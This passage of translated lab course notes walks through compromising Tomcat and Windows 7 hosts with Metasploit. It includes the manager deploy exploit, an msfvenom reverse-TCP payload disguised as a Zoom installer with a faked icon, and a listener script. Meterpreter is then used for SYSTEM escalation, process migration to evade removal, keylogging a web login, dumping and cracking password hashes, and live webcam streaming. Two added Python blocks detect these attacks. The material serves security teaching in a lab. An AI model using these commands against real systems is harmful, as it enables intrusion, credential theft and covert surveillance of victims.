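Both of the Tomcat steps above leave a clear trace in the manager's access log: the dictionary attack in 2) produces a burst of 401 responses for /manager/html from one client, and the deploy in 4) shows up as a deploy, a single request into the new context, and an undeploy within seconds. The following Python analyser is an added example (not from the notes or from Tomcat) that detects both patterns from log lines in Tomcat's "common" AccessLogValve format. The log lines are constructed for this example from the module output shown above; the deploy/undeploy request paths follow the form the module's PATH option describes (/deploy and /undeploy under /manager), and the thresholds (4 failures in 60 seconds, 5-minute lifetime) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in Tomcat's "common" access-log format (%h %l %u %t "%r" %s %b).
SAMPLE_ACCESS_LOG = """\
192.168.20.60 - admin [21/May/2022:09:00:00 +0900] "PUT /manager/deploy?path=/hr-portal HTTP/1.1" 200 71
192.168.20.50 - - [21/May/2022:17:25:01 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.20.50 - - [21/May/2022:17:25:01 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.20.50 - - [21/May/2022:17:25:02 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.20.50 - - [21/May/2022:17:25:02 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.20.50 - tomcat [21/May/2022:17:25:03 +0900] "GET /manager/html HTTP/1.1" 200 14836
10.0.0.5 - - [21/May/2022:17:26:10 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.20.50 - tomcat [21/May/2022:17:31:40 +0900] "PUT /manager/deploy?path=/6Yyvw8QjFVL HTTP/1.1" 200 71
192.168.20.50 - - [21/May/2022:17:31:41 +0900] "GET /6Yyvw8QjFVL/BZbjHiLu85HKuAU9RmK4cQ4.jsp HTTP/1.1" 200 0
192.168.20.50 - tomcat [21/May/2022:17:31:43 +0900] "GET /manager/undeploy?path=/6Yyvw8QjFVL HTTP/1.1" 200 67
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# Manager text commands: /manager/deploy?path=/ctx and /manager/undeploy?path=/ctx
MANAGER_CMD_RE = re.compile(r"^/manager/(?P<cmd>deploy|undeploy)\?(?:.*&)?path=(?P<ctx>/[^&]*)")


def parse_log(text):
    """Parse common-format lines into dicts (timezone-aware 'ts', int 'status'); skips bad lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        entries.append(e)
    return sorted(entries, key=lambda e: e["ts"])


def manager_bruteforce_sources(entries, threshold=4, window=timedelta(seconds=60)):
    """Client IPs with >= threshold 401s against /manager inside any sliding window."""
    by_ip = defaultdict(list)
    for e in entries:
        if e["status"] == 401 and e["path"].startswith("/manager"):
            by_ip[e["ip"]].append(e["ts"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        best, start = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def short_lived_deploys(entries, max_lifetime=timedelta(minutes=5)):
    """Contexts deployed and undeployed within max_lifetime, with the requests they served."""
    pending, served, findings = {}, defaultdict(list), []
    for e in entries:
        m = MANAGER_CMD_RE.match(e["path"])
        if m and m.group("cmd") == "deploy":
            pending[m.group("ctx")] = e
        elif m and m.group("cmd") == "undeploy" and m.group("ctx") in pending:
            ctx = m.group("ctx")
            deployed = pending.pop(ctx)
            lifetime = e["ts"] - deployed["ts"]
            if lifetime <= max_lifetime:
                findings.append({
                    "context": ctx,
                    "source": deployed["ip"],
                    "deployed_by": deployed["user"],
                    "lifetime_s": lifetime.total_seconds(),
                    "requests": served.pop(ctx, []),
                })
        else:
            for ctx in pending:  # request into a context that is currently deployed
                if e["path"].startswith(ctx + "/"):
                    served[ctx].append(e["path"])
    return findings


if __name__ == "__main__":
    log = parse_log(SAMPLE_ACCESS_LOG)
    print("brute-force sources:", manager_bruteforce_sources(log))
    for f in short_lived_deploys(log):
        print("short-lived context:", f)
```

The legitimate hr-portal deployment is never undeployed and so is not reported, while the random-name context lives for three seconds and serves exactly one JSP request, which is the shape of the transcript above. The same log also shows the cheaper fix: the manager application should not be reachable from arbitrary clients at all, and accounts with the manager role need a password that a default wordlist does not contain.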
5) Uploading a malicious payload (java/meterpreter/bind_tcp) with 'tomcat_mgr_deploy'
msf exploit(multi/http/tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf exploit(multi/http/tomcat_mgr_deploy) > set payload java/meterpreter/bind_tcp
payload => java/meterpreter/bind_tcp
msf exploit(multi/http/tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword tomcat no The password for the specified username
HttpUsername tomcat no The username to authenticate as
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.20.204 yes The target address
RPORT 8180 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (java/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.20.204 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/http/tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Sending stage (53837 bytes) to 192.168.20.204
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6259 bytes as bU103ap6GvSDwfsJMN1lnLk53HXoI.war ...
[*] Meterpreter session 2 opened (192.168.20.50:36139 -> 192.168.20.204:4444) at 2022-05-21 17:38:12 +0900
[*] Executing /bU103ap6GvSDwfsJMN1lnLk53HXoI/qiBx7hN0Zx.jsp...
[*] Undeploying bU103ap6GvSDwfsJMN1lnLk53HXoI ...
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
meterpreter >
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
whoami
tomcat55
pwd
/
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat55@metasploitable:/$
tomcat55@metasploitable:/$ ^C
Terminate channel 1? [y/N] y
meterpreter >
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.204 - Meterpreter session 2 closed. Reason: User exit
msf exploit(multi/http/tomcat_mgr_deploy) >
Ex) Try the exploit with a Reverse TCP payload.
LHOST 192.168.20.50
LPORT 4444
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
[Note] meterpreter
- A penetration-testing tool inside Metasploit that provides a wide range of functions
- Ex) system information, privilege escalation, keystroke sniffing, monitor screenshots, webcam video and snapshots, SMS text theft, GPS location lookup
[Note] Configuring a shared folder between the host system and VMware
- On the host system (Windows 10), create a shared folder named 'vmshare' inside your personal folder.
- In VMware (Kali, Windows7, Windows2008): right-click -> Settings -> Options -> Shared Folders
  check 'Always enabled'
- Folders -> Add -> Next -> [Settings] -> Finish -> OK
[Settings]
Host Path D:\개인 폴더\vmshare
Name vmshare
- On Kali, run the 'mount-shared-folders.sh' icon on the desktop.
- In a terminal, run 'ls /mnt/hgfs' and confirm that the 'vmshare' directory is present.
- On Windows7 and Windows2008, open Computer -> Network (left pane) -> vmware-host -> Shared Folders -> confirm the 'vmshare' folder.
- Instructor PC shared folder -> \\192.168.10.27 -> 98_도구 -> copy the '04_Resource Hacker' folder to D:\개인 폴더\vmshare.
10. Building and distributing a 'Reverse_TCP' payload
1) Building a 'Reverse_TCP' payload on Kali with the 'msfvenom' command
- Use 'msfvenom' to build a malicious payload that performs a 'Reverse_TCP' connection.
root@kali:~# ls /usr/share/metasploit-framework
Gemfile db msfd plugins tools
Gemfile.lock documentation msfdb ruby vendor
Rakefile lib msfrpc script-exploit
app metasploit-framework.gemspec msfrpcd script-password
config modules msfupdate script-recon
data msfconsole msfvenom scripts
root@kali:~# mkdir payloads && cd payloads
root@kali:~/payloads# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.20.50 lport=4444 -f exe -o ZoomInstallerFull.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: ZoomInstallerFull.exe
2) Distributing the 'Reverse_TCP' payload via the VMware shared folder (vmshare)
- A crafted malicious payload has to be distributed by social-engineering techniques so that the user downloads and runs it.
- Because social engineering is hard to apply in the lab environment, the malicious payload is distributed through the shared folder instead.
① Copy the generated 'ZoomInstallerFull.exe' file to the host system's shared folder.
root@kali:~/payloads# cp ZoomInstallerFull.exe /mnt/hgfs/vmshare
root@kali:~/payloads# ls /mnt/hgfs/vmshare
ZoomInstallerFull.exe
root@kali:~/payloads# cd
② On the physical PC (Windows 10), use 'ResourceHacker' to apply a realistic icon to the 'ZoomInstallerFull.exe' file.
③ On Windows7 and Windows2008, copy 'ZoomInstallerFull.exe' from the 'vmshare' folder to the desktop.
[Note] VirusTotal
- https://www.virustotal.com/gui/home/upload
- Go to the VirusTotal site, upload the 'ZoomInstallerFull.exe' file, and review the results.
11. Creating the 'Reverse_TCP' listener script file
- On Kali, create a 'reverse.rc' script file that puts a handler into the listening state so the 'Reverse_TCP' payload can connect back when it runs.
root@kali:~# cat << EOF > reverse.rc
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.20.50
set lport 4444
set exitsession false
exploit -j -z
EOF
root@kali:~# ls -l reverse.rc
-rw-r--r-- 1 root root 149 5월 22 12:40 reverse.rc
12. Running the 'reverse.rc' script and the 'Reverse_TCP' malicious payload
1) Running the 'reverse.rc' script with msfconsole on Kali
root@kali:~# msfconsole -q -r reverse.rc
[*] Processing reverse.rc for ERB directives.
resource (reverse.rc)> use exploit/multi/handler
resource (reverse.rc)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (reverse.rc)> set lhost 192.168.20.50
lhost => 192.168.20.50
resource (reverse.rc)> set lport 4444
lport => 4444
resource (reverse.rc)> set exitsession false
exitsession => false
resource (reverse.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.20.50:4444
- In another terminal window on Kali, confirm that TCP 4444 is in the LISTEN state.
root@kali:~# netstat -nltp | grep 4444
tcp 0 0 192.168.20.50:4444 0.0.0.0:* LISTEN 2029/ruby
2) On the target system (Windows7), run the 'ZoomInstallerFull.exe' file, which performs the Reverse_TCP connection.
3) On Kali, confirm that a Meterpreter session has been established.
[*] Sending stage (205891 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49324) at 2022-05-22 12:48:46 +0900
msf exploit(multi/handler) >
- In another terminal window on Kali, confirm the TCP 4444 connection state.
root@kali:~# netstat -ntp | grep 4444
tcp 0 0 192.168.20.50:4444 192.168.20.202:49324 ESTABLISHED 2029/ruby
13. 'Meterpreter' features
msf exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows MSDN-SPECIAL\Administrator @ MSDN-SPECIAL 192.168.20.50:4444 -> 192.168.20.202:49324 (192.168.20.202)
1) Controlling the target system (Windows7) with 'meterpreter'
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
2) Checking target system (Windows7) information
meterpreter > sysinfo
Computer : MSDN-SPECIAL
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > ifconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Microsoft Teredo Tunneling Adapter
Hardware MAC : 00:00:00:00:00:00
MTU : 1280
IPv6 Address : fe80::100:7f:fffe
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 12
============
Name : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:82:c5:58
MTU : 1500
IPv4 Address : 192.168.20.202
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::d9cb:96ac:6dc8:e078
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > arp
ARP cache
=========
IP address MAC address Interface
---------- ----------- ---------
192.168.20.1 00:50:56:c0:00:01 12
192.168.20.50 00:0c:29:cd:dd:3d 12
192.168.20.100 00:0c:29:37:7f:2c 12
192.168.20.200 00:0c:29:9f:c2:3e 12
192.168.20.255 ff:ff:ff:ff:ff:ff 12
224.0.0.22 00:00:00:00:00:00 1
224.0.0.22 01:00:5e:00:00:16 12
224.0.0.252 01:00:5e:00:00:fc 12
239.255.255.250 00:00:00:00:00:00 1
239.255.255.250 01:00:5e:7f:ff:fa 12
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.20.100 266 12
127.0.0.0 255.0.0.0 127.0.0.1 306 1
127.0.0.1 255.255.255.255 127.0.0.1 306 1
127.255.255.255 255.255.255.255 127.0.0.1 306 1
192.168.20.0 255.255.255.0 192.168.20.202 266 12
192.168.20.202 255.255.255.255 192.168.20.202 266 12
192.168.20.255 255.255.255.255 192.168.20.202 266 12
224.0.0.0 240.0.0.0 127.0.0.1 306 1
224.0.0.0 240.0.0.0 192.168.20.202 266 12
255.255.255.255 255.255.255.255 127.0.0.1 306 1
255.255.255.255 255.255.255.255 192.168.20.202 266 12
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 736/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 396/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 800/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 920/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 496/services.exe
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 1592/svchost.exe
tcp 0.0.0.0:49157 0.0.0.0:* LISTEN 0 0 512/lsass.exe
tcp 192.168.20.202:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 192.168.20.202:49160 192.168.20.50:4444 ESTABLISHED 0 0 2780/ZoomInstallerFull.exe
tcp 192.168.20.202:49161 104.74.157.169:443 CLOSE_WAIT 0 0 2116/jucheck.exe
tcp6 :::135 :::*
~ omitted ~
3) Checking and escalating privileges
meterpreter > getuid
Server username: MSDN-SPECIAL\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
4) Checking target system (Windows7) processes
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
224 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
240 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
264 484 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
316 300 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
376 300 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
396 384 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
448 384 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
484 376 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
492 376 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
500 376 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
616 484 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
676 484 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
720 484 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
796 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
844 484 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
872 484 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
996 484 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1072 272 explorer.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\Explorer.EXE
1112 2744 dinotify.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\System32\dinotify.exe
1136 484 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1164 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1348 484 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1384 484 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1552 484 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1636 616 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
1700 484 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\dllhost.exe
1812 484 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
1948 484 taskhost.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\taskhost.exe
2000 844 dwm.exe x64 1 MSDN-SPECIAL\Administrator C:\Windows\system32\Dwm.exe
2168 1396 GoogleCrashHandler.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
2212 1072 vmtoolsd.exe x64 1 MSDN-SPECIAL\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2324 2240 jusched.exe x86 1 MSDN-SPECIAL\Administrator C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
2356 1072 ZoomInstallerFull.exe x64 1 MSDN-SPECIAL\Administrator C:\Users\Administrator\Desktop\ZoomInstallerFull.exe
2816 1396 GoogleCrashHandler64.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
2956 484 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
Ex) What are the PID/PPID and the process name of the process on the target system (Windows7) that is connected to Kali via Reverse_TCP?
meterpreter > getpid
Current pid: 2356
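The netstat output in 2) and the process list in 4) together answer the exercise from the defender's side: the ESTABLISHED connection to 192.168.20.50:4444 belongs to an executable launched by explorer.exe from the user's Desktop. The following Python block is an added example (not from the notes or from Metasploit) that correlates the two listings and flags connections whose owning process runs from a user-writable path or talks to an uncommon remote port. The rows are constructed from the columns shown above (the notes show PID 2356 in ps and 2780 in netstat because they come from different runs; the sample uses 2356 for both), and the path markers and expected-port set are assumptions.

```python
# Constructed rows modelled on the meterpreter 'ps' and 'netstat' columns in the notes.
PROCESSES = [
    {"pid": 4,    "ppid": 0,    "name": "System",                "path": ""},
    {"pid": 484,  "ppid": 376,  "name": "services.exe",          "path": r"C:\Windows\system32\services.exe"},
    {"pid": 736,  "ppid": 484,  "name": "svchost.exe",           "path": r"C:\Windows\system32\svchost.exe"},
    {"pid": 1072, "ppid": 272,  "name": "explorer.exe",          "path": r"C:\Windows\Explorer.EXE"},
    {"pid": 2116, "ppid": 2240, "name": "jucheck.exe",
     "path": r"C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe"},
    {"pid": 2356, "ppid": 1072, "name": "ZoomInstallerFull.exe",
     "path": r"C:\Users\Administrator\Desktop\ZoomInstallerFull.exe"},
]
CONNECTIONS = [  # (proto, local address, remote address, state, pid)
    ("tcp", "0.0.0.0:135",          "0.0.0.0:*",          "LISTEN",      736),
    ("tcp", "192.168.20.202:49160", "192.168.20.50:4444", "ESTABLISHED", 2356),
    ("tcp", "192.168.20.202:49161", "104.74.157.169:443", "ESTABLISHED", 2116),
]

# Assumed heuristics: locations a normal user can write to, and remote ports where
# outbound connections from a workstation are expected.
USER_WRITABLE_MARKERS = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")
EXPECTED_REMOTE_PORTS = {25, 53, 80, 88, 135, 139, 389, 443, 445, 465, 587, 636, 993, 995, 3268, 3269}


def _remote_port(endpoint):
    """'host:port' -> int port, or None for a wildcard ('*') port."""
    port = endpoint.rsplit(":", 1)[1]
    return int(port) if port.isdigit() else None


def suspicious_connections(processes, connections):
    """Join ESTABLISHED connections to their owning process and return the ones that trip a rule."""
    procs = {p["pid"]: p for p in processes}
    findings = []
    for proto, local, remote, state, pid in connections:
        if state != "ESTABLISHED":
            continue
        proc = procs.get(pid)
        if proc is None:
            continue
        reasons = []
        path = proc["path"].lower()
        if any(marker in path for marker in USER_WRITABLE_MARKERS):
            reasons.append("image runs from a user-writable path")
        port = _remote_port(remote)
        if port is not None and port not in EXPECTED_REMOTE_PORTS:
            reasons.append(f"remote port {port} is not a commonly used service port")
        if reasons:
            findings.append({
                "pid": pid,
                "name": proc["name"],
                "path": proc["path"],
                "parent": procs.get(proc["ppid"], {}).get("name", "?"),
                "local": local,
                "remote": remote,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in suspicious_connections(PROCESSES, CONNECTIONS):
        print(f"{f['pid']} {f['name']} (parent {f['parent']}) {f['local']} -> {f['remote']}")
        for r in f["reasons"]:
            print("   -", r)
```

jucheck.exe is not reported: it runs from Program Files and talks to port 443. Keep in mind that the image-path rule is a point-in-time check; once the session is migrated into explorer.exe (step 5 below) the connection is owned by a process that lives in C:\Windows, and only the remote-endpoint rule still fires, so both rules are needed.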
5) Migrating the Reverse_TCP process on the target system (Windows7) into another process
- On the target system (Windows7), 'ZoomInstallerFull.exe' does nothing visible, so the user can terminate the process from Task Manager.
- For that reason, the 'ZoomInstallerFull.exe' process must be migrated into its parent process (1072 explorer.exe) or another process.
meterpreter > migrate 1072
[*] Migrating from 2356 to 1072...
[*] Migration completed successfully.
- If the migration fails, reboot Windows7.
- On Kali, exit Metasploit.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: User exit
[*] 192.168.20.202 - Meterpreter session 1 closed. Reason: Died
msf exploit(multi/handler) >
msf exploit(multi/handler) > exit
- Repeat step 12 and steps 13-1) through 5).
6) Target system (Windows7) screenshot
meterpreter > screenshot
Screenshot saved to: /root/ZLAcHSeg.jpeg
- On Kali, go to the '/root' directory and check the screenshot image file.
7) Target system (Windows7) keystroke sniffing
meterpreter > enumdesktops
Enumerating all accessible desktops
Desktops
========
Session Station Name
------- ------- ----
1 WinSta0 Default
1 WinSta0 Disconnect
1 WinSta0 Winlogon
meterpreter > setdesktop
Changed to desktop WinSta0\Default
meterpreter > getdesktop
Session 1\WinSta0\Default
meterpreter > keyscan_start
Starting the keystroke sniffer ...
- On the target system (Windows7), open Notepad and type some characters.
- On the target system (Windows7), launch the Chrome browser, go to Naver, and log in.
meterpreter > keyscan_dump
Dumping captured keystrokes...
<Left Windows>notepad<CR>
abcd1234<CR>
www.naver.com<CR>
ncs10322<Tab>abcd1234<CR>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
8) Password hash dumping and cracking on the target (Windows 7)
- hashdump pulls the local account hashes out of the SAM through the registry; it needs administrator/SYSTEM rights and the boot key, which it derives from the SYSKEY shown below.
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 9bdb6090f64856d2c16f39eddf5c210e...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
Administrator:"toor"
[*] Dumping password hashes...
(format: user:RID:LM hash:NT hash:::, the fourth field is the NT hash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:afc44ee7351d61d00698796da06b1ebf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
- The LM field aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, meaning LM hashing is disabled and only the NT hash is usable; the Guest NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty password.
[Reference] Online hash lookup
- https://hashes.com/en/decrypt/hash
- Enter the NT hash afc44ee7351d61d00698796da06b1ebf -> complete the captcha -> click SUBMIT & SEARCH
- Submitting hashes to a public site discloses them to a third party; on a real engagement crack them offline instead (john --format=NT or hashcat -m 1000 against a wordlist).
Found:
afc44ee7351d61d00698796da06b1ebf:toor
9) Webcam access on the target (Windows 7)
meterpreter > webcam_list
1: SPC-A1200MB Webcam
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/XOzzJyHN.jpeg
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: sZtogMZA.html
[*] Streaming...
- A browser opens on Kali and plays the live video from the target's (Windows 7) webcam.
- Once confirmed, press Ctrl+C to stop the webcam stream.
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: sZtogMZA.html
[*] Streaming...
(Ctrl+C)
[-] Error running command webcam_stream: Interrupt
meterpreter >
10) Killing a specific process on the target (Windows 7)
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
112 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
220 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
260 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
316 296 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
396 296 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
404 388 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
460 388 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
496 396 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
512 396 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
520 396 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
632 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
692 496 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
736 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
800 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
824 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
868 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
920 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1140 496 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1168 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1364 496 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1400 496 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1592 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
1692 632 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\wbem\wmiprvse.exe
